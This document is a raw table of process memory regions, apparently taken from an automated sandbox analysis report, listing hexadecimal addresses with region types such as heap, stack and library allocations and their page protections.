|
||
7FF83B840000
|
trusted library allocation
|
page read and write
|
||
1C4D001C000
|
heap
|
page read and write
|
||
1A7C49CC000
|
heap
|
page read and write
|
||
18C000F8000
|
trusted library allocation
|
page read and write
|
||
1A7C6829000
|
heap
|
page read and write
|
||
7FF83B886000
|
trusted library allocation
|
page read and write
|
||
883BF52000
|
stack
|
page read and write
|
||
1AA5180F000
|
trusted library allocation
|
page read and write
|
||
2080DE40000
|
heap
|
page read and write
|
||
204E7C8E000
|
heap
|
page read and write
|
||
204E7CAE000
|
heap
|
page read and write
|
||
1C4D07FA000
|
heap
|
page read and write
|
||
100679000
|
stack
|
page read and write
|
||
1C4CE21B000
|
heap
|
page read and write
|
||
1C4D008F000
|
heap
|
page read and write
|
||
2459176C000
|
heap
|
page read and write
|
||
1ECD6472000
|
trusted library allocation
|
page read and write
|
||
18C71B80000
|
heap
|
page execute and read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
1ECD6579000
|
trusted library allocation
|
page read and write
|
||
1AA69B20000
|
heap
|
page read and write
|
||
2D4A3F9000
|
stack
|
page read and write
|
||
1EF4FD8E000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
245936E0000
|
remote allocation
|
page read and write
|
||
208118D1000
|
trusted library allocation
|
page read and write
|
||
D00FCE000
|
stack
|
page read and write
|
||
7FF83B7D0000
|
trusted library allocation
|
page read and write
|
||
2546B764000
|
heap
|
page read and write
|
||
1C4CFFE4000
|
heap
|
page read and write
|
||
1FBCB397000
|
heap
|
page read and write
|
||
F509AFD000
|
stack
|
page read and write
|
||
7FF83B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
1BA58DB5000
|
heap
|
page read and write
|
||
7FF83B79D000
|
trusted library allocation
|
page execute and read and write
|
||
2390A16A000
|
heap
|
page read and write
|
||
2546B768000
|
heap
|
page read and write
|
||
139D8AB7000
|
heap
|
page read and write
|
||
7FF83B960000
|
trusted library allocation
|
page execute and read and write
|
||
18C00105000
|
trusted library allocation
|
page read and write
|
||
2459377A000
|
heap
|
page read and write
|
||
204E7B80000
|
remote allocation
|
page read and write
|
||
539AA4E000
|
stack
|
page read and write
|
||
24591788000
|
heap
|
page read and write
|
||
2104DEA4000
|
trusted library allocation
|
page read and write
|
||
24593A9C000
|
heap
|
page read and write
|
||
1EF53645000
|
trusted library allocation
|
page read and write
|
||
24591770000
|
heap
|
page read and write
|
||
208113A8000
|
trusted library allocation
|
page read and write
|
||
1ECD6495000
|
trusted library allocation
|
page read and write
|
||
85F447E000
|
stack
|
page read and write
|
||
139D8A3C000
|
heap
|
page read and write
|
||
B9A5FFE000
|
stack
|
page read and write
|
||
7FF83B9A0000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CE206000
|
heap
|
page read and write
|
||
139D8C40000
|
remote allocation
|
page read and write
|
||
91B173E000
|
stack
|
page read and write
|
||
2103F8B7000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C2000
|
trusted library allocation
|
page read and write
|
||
1C4D0041000
|
heap
|
page read and write
|
||
24593A82000
|
heap
|
page read and write
|
||
2103DA60000
|
heap
|
page read and write
|
||
21055BB1000
|
heap
|
page read and write
|
||
7FF7A1780000
|
unkown
|
page readonly
|
||
9FC358F000
|
stack
|
page read and write
|
||
18C6FD02000
|
heap
|
page read and write
|
||
1ECD43DA000
|
heap
|
page read and write
|
||
2DB4AC20000
|
heap
|
page read and write
|
||
7FF83B8A6000
|
trusted library allocation
|
page execute and read and write
|
||
2178E9E6000
|
trusted library allocation
|
page read and write
|
||
7FF83B98A000
|
trusted library allocation
|
page read and write
|
||
1A7C6826000
|
heap
|
page read and write
|
||
1C4CE340000
|
heap
|
page read and write
|
||
24593628000
|
heap
|
page read and write
|
||
1C4D000C000
|
heap
|
page read and write
|
||
139D8A35000
|
heap
|
page read and write
|
||
1A7C690A000
|
heap
|
page read and write
|
||
7DF49E280000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
2546BBE8000
|
heap
|
page read and write
|
||
24593D1B000
|
heap
|
page read and write
|
||
7FF83B84E000
|
trusted library allocation
|
page execute and read and write
|
||
2546BA24000
|
heap
|
page read and write
|
||
1C4D0296000
|
heap
|
page read and write
|
||
1FBCD319000
|
trusted library allocation
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
1FBCB675000
|
heap
|
page read and write
|
||
24593D38000
|
heap
|
page read and write
|
||
2DB32831000
|
trusted library allocation
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
BF532E3000
|
stack
|
page read and write
|
||
7FF83B8F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B7E0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C3000
|
trusted library allocation
|
page execute and read and write
|
||
BF5468F000
|
stack
|
page read and write
|
||
2179004D000
|
trusted library allocation
|
page read and write
|
||
1C4D04D1000
|
heap
|
page read and write
|
||
1C4D04B8000
|
heap
|
page read and write
|
||
18C6FE30000
|
heap
|
page readonly
|
||
57695FB000
|
stack
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
1A8EFA85000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C4000
|
trusted library allocation
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
1A8DDD84000
|
heap
|
page read and write
|
||
7FF83B970000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CFFD4000
|
heap
|
page read and write
|
||
1EF69DD9000
|
heap
|
page read and write
|
||
7FF83B792000
|
trusted library allocation
|
page read and write
|
||
1FBE5376000
|
heap
|
page execute and read and write
|
||
245919C0000
|
heap
|
page read and write
|
||
2103D6C0000
|
trusted library allocation
|
page read and write
|
||
117DEFE000
|
stack
|
page read and write
|
||
1FBCDB60000
|
trusted library allocation
|
page read and write
|
||
18C10078000
|
trusted library allocation
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
245916A0000
|
heap
|
page read and write
|
||
7FF7A1781000
|
unkown
|
page execute read
|
||
1C4D0471000
|
heap
|
page read and write
|
||
1A8E10E5000
|
trusted library allocation
|
page read and write
|
||
7FF83B88C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
2DB32774000
|
trusted library allocation
|
page read and write
|
||
2DB30A25000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
10083E000
|
stack
|
page read and write
|
||
1A8DDB10000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
56678FB000
|
stack
|
page read and write
|
||
174D4B59000
|
trusted library allocation
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
1C4D04E4000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
1A7C6C3F000
|
heap
|
page read and write
|
||
D0137E000
|
stack
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
139D8AB7000
|
heap
|
page read and write
|
||
24593D52000
|
heap
|
page read and write
|
||
254699B4000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
189FBE70000
|
heap
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
1ECD6997000
|
trusted library allocation
|
page read and write
|
||
5399C7E000
|
stack
|
page read and write
|
||
1A8F7F09000
|
heap
|
page read and write
|
||
7FF83B7A0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7AB000
|
trusted library allocation
|
page read and write
|
||
7FF83BA61000
|
trusted library allocation
|
page read and write
|
||
B9A6F8E000
|
stack
|
page read and write
|
||
2104DBB1000
|
trusted library allocation
|
page read and write
|
||
139D8AB7000
|
heap
|
page read and write
|
||
7FF83B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
254699AA000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
7FF83B9A2000
|
trusted library allocation
|
page read and write
|
||
139D8A3B000
|
heap
|
page read and write
|
||
245918A0000
|
heap
|
page read and write
|
||
2DB3080A000
|
heap
|
page read and write
|
||
24593681000
|
heap
|
page read and write
|
||
7FF83B81C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B981000
|
trusted library allocation
|
page read and write
|
||
189FDFA6000
|
heap
|
page read and write
|
||
5399AFD000
|
stack
|
page read and write
|
||
91B0DDE000
|
stack
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
1ECD441D000
|
heap
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
204E7471000
|
heap
|
page read and write
|
||
1C4D04F6000
|
heap
|
page read and write
|
||
204E7C81000
|
heap
|
page read and write
|
||
23924075000
|
heap
|
page read and write
|
||
2DB32723000
|
trusted library allocation
|
page read and write
|
||
204E747B000
|
heap
|
page read and write
|
||
1C4D0006000
|
heap
|
page read and write
|
||
24591725000
|
heap
|
page read and write
|
||
1C4D04F1000
|
heap
|
page read and write
|
||
1BA5A620000
|
heap
|
page read and write
|
||
174E4B11000
|
trusted library allocation
|
page read and write
|
||
566747E000
|
stack
|
page read and write
|
||
2080FCB1000
|
trusted library allocation
|
page read and write
|
||
2546BA52000
|
heap
|
page read and write
|
||
189FC150000
|
heap
|
page read and write
|
||
1007BB000
|
stack
|
page read and write
|
||
2DB326D0000
|
heap
|
page execute and read and write
|
||
2391BF89000
|
trusted library allocation
|
page read and write
|
||
7FF83B94A000
|
trusted library allocation
|
page read and write
|
||
21055E60000
|
heap
|
page read and write
|
||
1C4CE1AF000
|
heap
|
page read and write
|
||
24591706000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
98D69FE000
|
stack
|
page read and write
|
||
1C4D04AB000
|
heap
|
page read and write
|
||
174D2F70000
|
heap
|
page readonly
|
||
B9A5EFE000
|
stack
|
page read and write
|
||
1AA4F860000
|
heap
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
1C4CE1A2000
|
heap
|
page read and write
|
||
1C4D0015000
|
heap
|
page read and write
|
||
2081150C000
|
trusted library allocation
|
page read and write
|
||
204E7B80000
|
remote allocation
|
page read and write
|
||
1C4CE1C1000
|
heap
|
page read and write
|
||
9FC48CE000
|
stack
|
page read and write
|
||
1BA5AE73000
|
trusted library allocation
|
page read and write
|
||
204E7473000
|
heap
|
page read and write
|
||
1C4CE17E000
|
heap
|
page read and write
|
||
1ECD6785000
|
trusted library allocation
|
page read and write
|
||
204E7450000
|
heap
|
page read and write
|
||
7FF83B79D000
|
trusted library allocation
|
page execute and read and write
|
||
1ECD44C6000
|
heap
|
page read and write
|
||
1C4CE1E8000
|
heap
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1ECD5F20000
|
heap
|
page read and write
|
||
217A6D20000
|
heap
|
page execute and read and write
|
||
1BA72D13000
|
heap
|
page read and write
|
||
1A7C499D000
|
heap
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
7FF83B960000
|
trusted library allocation
|
page read and write
|
||
7FF83B8A6000
|
trusted library allocation
|
page execute and read and write
|
||
174D2F90000
|
trusted library allocation
|
page read and write
|
||
21790672000
|
trusted library allocation
|
page read and write
|
||
1EF61C80000
|
trusted library allocation
|
page read and write
|
||
2459361E000
|
heap
|
page read and write
|
||
7FF83B7C3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
1A8EFA21000
|
trusted library allocation
|
page read and write
|
||
245939FC000
|
heap
|
page read and write
|
||
189FE04B000
|
heap
|
page read and write
|
||
2459361E000
|
heap
|
page read and write
|
||
1C4CE4EA000
|
heap
|
page read and write
|
||
1A7C6836000
|
heap
|
page read and write
|
||
24593A5A000
|
heap
|
page read and write
|
||
174ECD70000
|
heap
|
page execute and read and write
|
||
1C4CFFDD000
|
heap
|
page read and write
|
||
2080E114000
|
heap
|
page read and write
|
||
1ECD6ABC000
|
trusted library allocation
|
page read and write
|
||
1C4D084B000
|
heap
|
page read and write
|
||
1AA51C1A000
|
trusted library allocation
|
page read and write
|
||
245935EC000
|
heap
|
page read and write
|
||
1A7C4950000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA8D000
|
trusted library allocation
|
page read and write
|
||
1A8F7C18000
|
heap
|
page read and write
|
||
FE1AB7E000
|
stack
|
page read and write
|
||
1C4D0054000
|
heap
|
page read and write
|
||
7FF83B8F0000
|
trusted library allocation
|
page execute and read and write
|
||
2459172C000
|
heap
|
page read and write
|
||
1EF69E28000
|
heap
|
page read and write
|
||
2390BF6E000
|
trusted library allocation
|
page read and write
|
||
7FF83B95A000
|
trusted library allocation
|
page read and write
|
||
2DB4AC30000
|
heap
|
page read and write
|
||
24593D02000
|
heap
|
page read and write
|
||
18C6FD49000
|
heap
|
page read and write
|
||
1C4CE1AB000
|
heap
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
1AA4FA50000
|
trusted library allocation
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
2103DDDE000
|
trusted library allocation
|
page read and write
|
||
566737E000
|
stack
|
page read and write
|
||
1C4CE4EC000
|
heap
|
page read and write
|
||
1FBCD2C0000
|
heap
|
page execute and read and write
|
||
189FE081000
|
heap
|
page read and write
|
||
21056150000
|
heap
|
page read and write
|
||
10047D000
|
stack
|
page read and write
|
||
1C4D0470000
|
heap
|
page read and write
|
||
64F54FE000
|
stack
|
page read and write
|
||
1C4D0469000
|
heap
|
page read and write
|
||
24593628000
|
heap
|
page read and write
|
||
217A6AB0000
|
heap
|
page read and write
|
||
1A7C6837000
|
heap
|
page read and write
|
||
2D4A07E000
|
stack
|
page read and write
|
||
204E74BA000
|
heap
|
page read and write
|
||
1BA6AAF7000
|
trusted library allocation
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
1A7C6C30000
|
heap
|
page read and write
|
||
2DB321F0000
|
trusted library allocation
|
page read and write
|
||
1EF4FDCC000
|
heap
|
page read and write
|
||
18C000FB000
|
trusted library allocation
|
page read and write
|
||
2105615A000
|
heap
|
page read and write
|
||
204E749F000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
1C4D04AA000
|
heap
|
page read and write
|
||
20811996000
|
trusted library allocation
|
page read and write
|
||
7FF83B890000
|
trusted library allocation
|
page execute and read and write
|
||
204E7C88000
|
heap
|
page read and write
|
||
1BA58E30000
|
trusted library allocation
|
page read and write
|
||
5617479000
|
stack
|
page read and write
|
||
1C4D0472000
|
heap
|
page read and write
|
||
24593D68000
|
heap
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
139D8A39000
|
heap
|
page read and write
|
||
2546BBE8000
|
heap
|
page read and write
|
||
24593A3F000
|
heap
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
2DB309A0000
|
heap
|
page read and write
|
||
1ECD44AF000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
18C71E90000
|
heap
|
page read and write
|
||
2546B78D000
|
heap
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
1AA4F820000
|
heap
|
page read and write
|
||
1A7C6803000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
1BA5B0BA000
|
trusted library allocation
|
page read and write
|
||
139D8AB2000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
7FF83B982000
|
trusted library allocation
|
page read and write
|
||
2459179D000
|
heap
|
page read and write
|
||
7FF83BB30000
|
trusted library allocation
|
page read and write
|
||
21055D0B000
|
heap
|
page read and write
|
||
1AA4F7E0000
|
heap
|
page read and write
|
||
1AA617B1000
|
trusted library allocation
|
page read and write
|
||
2081FE6B000
|
trusted library allocation
|
page read and write
|
||
1C4D07CB000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
1ECD441F000
|
heap
|
page read and write
|
||
1AA4F8C7000
|
heap
|
page read and write
|
||
2103BC90000
|
heap
|
page read and write
|
||
18C00108000
|
trusted library allocation
|
page read and write
|
||
24593A05000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
2178F5CD000
|
trusted library allocation
|
page read and write
|
||
BF539B7000
|
stack
|
page read and write
|
||
1EF4FD70000
|
heap
|
page read and write
|
||
7FF83B84C000
|
trusted library allocation
|
page execute and read and write
|
||
1AA4FA30000
|
trusted library allocation
|
page read and write
|
||
24593D38000
|
heap
|
page read and write
|
||
2391BF11000
|
trusted library allocation
|
page read and write
|
||
1AA51C4F000
|
trusted library allocation
|
page read and write
|
||
204E7FA3000
|
heap
|
page read and write
|
||
2D4A7BE000
|
stack
|
page read and write
|
||
1ECD68DF000
|
trusted library allocation
|
page read and write
|
||
18C00102000
|
trusted library allocation
|
page read and write
|
||
1C4CFFDB000
|
heap
|
page read and write
|
||
174D4BED000
|
trusted library allocation
|
page read and write
|
||
5399B7E000
|
stack
|
page read and write
|
||
1ECEE5F9000
|
heap
|
page read and write
|
||
18980001000
|
trusted library allocation
|
page read and write
|
||
1C4D0117000
|
heap
|
page read and write
|
||
25469B50000
|
heap
|
page read and write
|
||
B9A5BFF000
|
stack
|
page read and write
|
||
2081FD28000
|
trusted library allocation
|
page read and write
|
||
2546B741000
|
heap
|
page read and write
|
||
7FF83B7D4000
|
trusted library allocation
|
page read and write
|
||
245935DC000
|
heap
|
page read and write
|
||
1A8E13F6000
|
trusted library allocation
|
page read and write
|
||
1ECD5EA0000
|
trusted library allocation
|
page read and write
|
||
18C000ED000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C3000
|
trusted library allocation
|
page execute and read and write
|
||
1EF5330C000
|
trusted library allocation
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1ECD6AAA000
|
trusted library allocation
|
page read and write
|
||
1A8DDCE6000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1C4D02A6000
|
heap
|
page read and write
|
||
23924088000
|
heap
|
page read and write
|
||
1C4D04F8000
|
heap
|
page read and write
|
||
9FC397D000
|
stack
|
page read and write
|
||
1C4CE21B000
|
heap
|
page read and write
|
||
7FF83B7D3000
|
trusted library allocation
|
page execute and read and write
|
||
2DB30818000
|
heap
|
page read and write
|
||
204E74AB000
|
heap
|
page read and write
|
||
189FC0F0000
|
trusted library allocation
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
245935F0000
|
heap
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page read and write
|
||
1FBCD5F0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
955B4FE000
|
stack
|
page read and write
|
||
1C4D04C3000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
539978E000
|
stack
|
page read and write
|
||
5399DF8000
|
stack
|
page read and write
|
||
1A7C6801000
|
heap
|
page read and write
|
||
189FC130000
|
heap
|
page readonly
|
||
7FF83B85C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
174D2D90000
|
heap
|
page read and write
|
||
208113E0000
|
trusted library allocation
|
page read and write
|
||
1A7C6C6E000
|
heap
|
page read and write
|
||
24591767000
|
heap
|
page read and write
|
||
7FF83B850000
|
trusted library allocation
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
883C5BE000
|
stack
|
page read and write
|
||
1C4D048B000
|
heap
|
page read and write
|
||
24593D68000
|
heap
|
page read and write
|
||
1C4CE22A000
|
heap
|
page read and write
|
||
204E7F72000
|
heap
|
page read and write
|
||
7FF83B794000
|
trusted library allocation
|
page read and write
|
||
2D4A83B000
|
stack
|
page read and write
|
||
1A7C67CA000
|
heap
|
page read and write
|
||
1C4D0481000
|
heap
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
BF53CBC000
|
stack
|
page read and write
|
||
1C4CFFE2000
|
heap
|
page read and write
|
||
18C006AA000
|
trusted library allocation
|
page read and write
|
||
1FBCB590000
|
heap
|
page read and write
|
||
7FF83BB20000
|
trusted library allocation
|
page read and write
|
||
18C007FE000
|
trusted library allocation
|
page read and write
|
||
2390C00F000
|
trusted library allocation
|
page read and write
|
||
2390BF00000
|
heap
|
page read and write
|
||
2080DEC4000
|
heap
|
page read and write
|
||
2D4A63E000
|
stack
|
page read and write
|
||
1A8DDC70000
|
trusted library allocation
|
page read and write
|
||
5768FFE000
|
stack
|
page read and write
|
||
24593D46000
|
heap
|
page read and write
|
||
1C4D011A000
|
heap
|
page read and write
|
||
174D2E45000
|
heap
|
page read and write
|
||
1A7C6C24000
|
heap
|
page read and write
|
||
B9A6338000
|
stack
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
D014FE000
|
stack
|
page read and write
|
||
2080E0F0000
|
heap
|
page read and write
|
||
24593ABE000
|
heap
|
page read and write
|
||
139D8A37000
|
heap
|
page read and write
|
||
98D67FC000
|
stack
|
page read and write
|
||
174D4FC3000
|
trusted library allocation
|
page read and write
|
||
1AA4FA60000
|
heap
|
page execute and read and write
|
||
2103D704000
|
heap
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
2DB325F0000
|
trusted library allocation
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
1ECD6503000
|
trusted library allocation
|
page read and write
|
||
1C4D04F8000
|
heap
|
page read and write
|
||
1BA5A670000
|
heap
|
page execute and read and write
|
||
2DB32701000
|
trusted library allocation
|
page read and write
|
||
7FF83B870000
|
trusted library allocation
|
page read and write
|
||
7FF83B890000
|
trusted library allocation
|
page execute and read and write
|
||
204E7C7D000
|
heap
|
page read and write
|
||
208114A2000
|
trusted library allocation
|
page read and write
|
||
174D4C6B000
|
trusted library allocation
|
page read and write
|
||
24593A79000
|
heap
|
page read and write
|
||
18980117000
|
trusted library allocation
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
1EF4FDB4000
|
heap
|
page read and write
|
||
1008BE000
|
stack
|
page read and write
|
||
64F53FF000
|
stack
|
page read and write
|
||
7FF83B7D0000
|
trusted library allocation
|
page read and write
|
||
139D8A3E000
|
heap
|
page read and write
|
||
139D8A4E000
|
heap
|
page read and write
|
||
1AA51A98000
|
trusted library allocation
|
page read and write
|
||
2459360C000
|
heap
|
page read and write
|
||
2546B73D000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
204E7C72000
|
heap
|
page read and write
|
||
2080DE9E000
|
heap
|
page read and write
|
||
245916FE000
|
heap
|
page read and write
|
||
1C4CE20E000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
B9A6F0E000
|
stack
|
page read and write
|
||
18C00085000
|
trusted library allocation
|
page read and write
|
||
1C4CE1C5000
|
heap
|
page read and write
|
||
245935FC000
|
heap
|
page read and write
|
||
18C71EA0000
|
heap
|
page read and write
|
||
24593D15000
|
heap
|
page read and write
|
||
7FF83B7DD000
|
trusted library allocation
|
page execute and read and write
|
||
56170FF000
|
stack
|
page read and write
|
||
1ECD45A0000
|
heap
|
page read and write
|
||
2459361E000
|
heap
|
page read and write
|
||
245938D6000
|
heap
|
page read and write
|
||
955B57E000
|
stack
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
1A8F7EB0000
|
heap
|
page read and write
|
||
174D4C29000
|
trusted library allocation
|
page read and write
|
||
217A6C40000
|
heap
|
page read and write
|
||
561783C000
|
stack
|
page read and write
|
||
24593625000
|
heap
|
page read and write
|
||
174D50CE000
|
trusted library allocation
|
page read and write
|
||
1AA4F7B0000
|
heap
|
page read and write
|
||
1C4CE1F9000
|
heap
|
page read and write
|
||
7FF83B856000
|
trusted library allocation
|
page read and write
|
||
189FC0D0000
|
trusted library section
|
page read and write
|
||
5617638000
|
stack
|
page read and write
|
||
24593618000
|
heap
|
page read and write
|
||
7FF83B950000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CFFFD000
|
heap
|
page read and write
|
||
1A7C49B6000
|
heap
|
page read and write
|
||
1A7C6C35000
|
heap
|
page read and write
|
||
2080DCB0000
|
heap
|
page read and write
|
||
1C4D011B000
|
heap
|
page read and write
|
||
1EF532A3000
|
trusted library allocation
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
B9A607E000
|
stack
|
page read and write
|
||
204E7491000
|
heap
|
page read and write
|
||
20827DD5000
|
heap
|
page read and write
|
||
7FF83B88C000
|
trusted library allocation
|
page execute and read and write
|
||
FE1AC7E000
|
stack
|
page read and write
|
||
1FBCD3DD000
|
trusted library allocation
|
page read and write
|
||
7FF83B7AB000
|
trusted library allocation
|
page read and write
|
||
24593D0E000
|
heap
|
page read and write
|
||
1C4D07EB000
|
heap
|
page read and write
|
||
1ECD695F000
|
trusted library allocation
|
page read and write
|
||
1C4D011D000
|
heap
|
page read and write
|
||
18C71D90000
|
heap
|
page read and write
|
||
2459178E000
|
heap
|
page read and write
|
||
2082823D000
|
heap
|
page read and write
|
||
91B0D53000
|
stack
|
page read and write
|
||
7FF83BA04000
|
trusted library allocation
|
page read and write
|
||
204E748B000
|
heap
|
page read and write
|
||
9FC38FF000
|
stack
|
page read and write
|
||
2D4A0FF000
|
stack
|
page read and write
|
||
1C4D000C000
|
heap
|
page read and write
|
||
254698A0000
|
heap
|
page read and write
|
||
24591770000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
245935C6000
|
heap
|
page read and write
|
||
1C4D0481000
|
heap
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
1C4CFFD5000
|
heap
|
page read and write
|
||
883C27E000
|
stack
|
page read and write
|
||
7FF83B9B2000
|
trusted library allocation
|
page read and write
|
||
2546B7AA000
|
heap
|
page read and write
|
||
2178E536000
|
heap
|
page read and write
|
||
2178E8B3000
|
trusted library allocation
|
page read and write
|
||
7FF83B940000
|
trusted library allocation
|
page read and write
|
||
1C4D07D9000
|
heap
|
page read and write
|
||
24591788000
|
heap
|
page read and write
|
||
24593D1C000
|
heap
|
page read and write
|
||
D0147F000
|
stack
|
page read and write
|
||
254698E0000
|
heap
|
page read and write
|
||
1C4D0826000
|
heap
|
page read and write
|
||
7FF7A1984000
|
unkown
|
page readonly
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1C4D0826000
|
heap
|
page read and write
|
||
24593A81000
|
heap
|
page read and write
|
||
1C4D07C0000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA8C000
|
trusted library allocation
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
204E7F91000
|
heap
|
page read and write
|
||
2178E4B0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7E0000
|
trusted library allocation
|
page read and write
|
||
1A8F7F49000
|
heap
|
page read and write
|
||
1ECEE740000
|
heap
|
page read and write
|
||
1A7C49DF000
|
heap
|
page read and write
|
||
24593601000
|
heap
|
page read and write
|
||
1C4D04FC000
|
heap
|
page read and write
|
||
98D66FE000
|
stack
|
page read and write
|
||
189FDF33000
|
trusted library allocation
|
page read and write
|
||
2390C556000
|
trusted library allocation
|
page read and write
|
||
7FF83B846000
|
trusted library allocation
|
page read and write
|
||
2546BC32000
|
heap
|
page read and write
|
||
24593A49000
|
heap
|
page read and write
|
||
1A7C6F10000
|
heap
|
page read and write
|
||
189FDFE1000
|
heap
|
page read and write
|
||
2178E9A1000
|
trusted library allocation
|
page read and write
|
||
1BA5AE62000
|
trusted library allocation
|
page read and write
|
||
883C7BE000
|
stack
|
page read and write
|
||
1A7C67E2000
|
heap
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
7FF7A1981000
|
unkown
|
page write copy
|
||
85F44FC000
|
stack
|
page read and write
|
||
24593772000
|
heap
|
page read and write
|
||
1A7C6904000
|
heap
|
page read and write
|
||
1EF51C71000
|
trusted library allocation
|
page read and write
|
||
18C6FD06000
|
heap
|
page read and write
|
||
1A7C6B70000
|
heap
|
page read and write
|
||
189800A1000
|
trusted library allocation
|
page read and write
|
||
1C4CE320000
|
heap
|
page read and write
|
||
1A7C6907000
|
heap
|
page read and write
|
||
1A7C6806000
|
heap
|
page read and write
|
||
7FF83B85C000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D07FA000
|
heap
|
page read and write
|
||
FE1AAFF000
|
stack
|
page read and write
|
||
174D2F60000
|
trusted library allocation
|
page read and write
